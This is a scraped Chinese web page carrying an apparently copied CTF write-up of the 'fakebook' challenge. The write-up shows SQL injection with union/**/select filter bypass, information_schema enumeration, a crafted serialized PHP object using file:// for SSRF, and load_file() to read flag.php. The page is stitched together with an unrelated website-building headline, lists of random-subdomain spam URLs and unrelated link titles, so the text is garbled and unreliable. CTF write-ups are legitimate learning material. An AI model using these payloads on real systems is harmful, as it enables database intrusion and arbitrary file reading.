当前位置: 首页 > wzjs >正文

网站建设怎么样网站里的活动专题栏怎么做

wzjs 2025/9/9 0:40:09
网站建设怎么样,网站里的活动专题栏怎么做,同安区建设局网站招投标,酒店网站开发合同范本打开题目链接 尝试弱口令登录 失败 随便注册 点击admin后跳转到下面这个页面 显示的是注册用户信息,观察url发现no1,猜测存在注入 用单引号测试一下,报错,确实存在SQL注入 使用order by 判断字段数 ?no1 order by 5 5的时候…

打开题目链接

尝试弱口令登录

失败

 随便注册

点击admin后跳转到下面这个页面

显示的是注册用户信息,观察url发现no=1,猜测存在注入

用单引号测试一下,报错,确实存在SQL注入

使用order by 判断字段数

?no=1 order by 5

5的时候报错,说明有4列

尝试联合查询注入,发现存在过滤

?no=0 union select 1,2,3,4 --+

尝试使用大小写绕过,发现不行

这里要使用内联注释/**/绕过

?no=0 union/**/select 1,2,3,4 --+

可以看到回显位在2

查数据库名:

?no=0 union/**/select 1,database(),3,4 --+

数据库名为fakebook

查该数据库下所有的表名:

?no=0 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='fakebook'--+

可以看到存在一个叫uses的表

查该表下的列名信息:

?no=0 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='users'--+

我们一般还会对条件进行限制,指定查哪个数据库下的

?no=0 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='users' and table_schema='fakebook'--+

可以看到结果就少了几个

查具体字段信息:

?no=0 union/**/select 1,data,3,4 from fakebook.users --+

是一串序列化后的信息 :

O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:10;s:4:"blog";s:8:"zxc.blog";}

name、age、blog为data反序列化值,blog读取成功会返回url值

我们可以通过反序列化来实现ssrf读取任意文件

通过目录扫描

知道flag就在html目录下

即:/var/www/html/flag.php 

?no=0 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:10;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'

查看源码发现base64编码

解码得到flag

flag{c1e552fdf77049fabf65168f22f7aeab}

这里有一个更简单的方法,由于知道了flag的路径,直接使用load_file()函数进行文件读取:

?no=0 union/**/select 1,load_file('/var/www/html/flag.php'),3,4 --+

查看源码,找到flag


文章转载自:

http://0FFM6aBS.xdzLj.cn
http://ZOWqNTKt.xdzLj.cn
http://bn09p3rT.xdzLj.cn
http://bPMoOJNh.xdzLj.cn
http://xUYvpBNg.xdzLj.cn
http://5A11A8dS.xdzLj.cn
http://sfluybyZ.xdzLj.cn
http://qx261Tpy.xdzLj.cn
http://qplmK4Sd.xdzLj.cn
http://44nLAbxY.xdzLj.cn
http://JdeJRw9w.xdzLj.cn
http://lybDQVoP.xdzLj.cn
http://AsJXxUPI.xdzLj.cn
http://zVGQBY1y.xdzLj.cn
http://AAYvLjuR.xdzLj.cn
http://RRiocHrl.xdzLj.cn
http://Fvkp9JTP.xdzLj.cn
http://rwxrDHc3.xdzLj.cn
http://JyU2c2fH.xdzLj.cn
http://Kw1QXbP8.xdzLj.cn
http://kSjbHSTy.xdzLj.cn
http://bdpPU7Cs.xdzLj.cn
http://FmDHZ3S2.xdzLj.cn
http://OBvwx7Fm.xdzLj.cn
http://xPpcvV5i.xdzLj.cn
http://cDhehFqH.xdzLj.cn
http://tA4bzbt2.xdzLj.cn
http://zzTqBybs.xdzLj.cn
http://o2i8ajOA.xdzLj.cn
http://w6tLOc34.xdzLj.cn
http://www.dtcms.com/wzjs/642356.html

相关文章:

  • 前几年做那个网站能致富网页设计与制作项目教程答案
  • 网站开发是怎么开发的网站建设基本流程备案
  • 织梦dedecms网站简略标题shorttitle的使用方法云南建设注册考试中心网站app
  • 杭州建设网站公司网站网站建设走什么科目
  • 从哪些方面建设网站周至做网站的公司
  • 上海网站建设服务电话只做网站不做app
  • 站群网站和做seo那个号上海做网站站优云一一十七
  • 网站备案主体信息变更湖北网站seo设计
  • 漳州市网站建设网站建设步骤和流程
  • 苏州建设交通学校网站logo智能设计
  • 泉州做网站建设聊城做网站的公司咨询
  • 做网上商城网站设计茶叶网站建设策划书ppt
  • 北京网站关键词排名推广响水做网站
  • 禄丰网站建设濮阳网站建设网站
  • 学校实验室网站建设现状小企业想做网站推广找哪家强
  • 注册个人网站要多少钱深圳做公司英文网站多少钱
  • 免费ai写作网站3000字群排名优化软件
  • 坚持网站机制建设个人网站建设基本教程
  • 合肥网站建设怎么做河南建设人才教育信息网
  • 搭建网站多少钱8一9岁的手工
  • 内蒙古自治区生态文明建设网站2017网站开发薪资
  • 延安免费做网站网站排名软件利搜怎么样
  • 京鑫建设集团网站网站建设属于硬件还是软件
  • 织梦做小游戏网站织梦网站统计代码
  • 想在网站卖房怎么做怎么创建二级域名
  • 毕业设计做视频网站设计师服务平台下载不了
  • 商城类网站主要分为哪些模块wordpress文章内图片不显示
  • 宁波建网站找哪家网站平台建设设备清单
  • 做一下网站需要什么矢量网站动画怎么做
  • 网站建设与制作培训通知布吉附近网站建设公司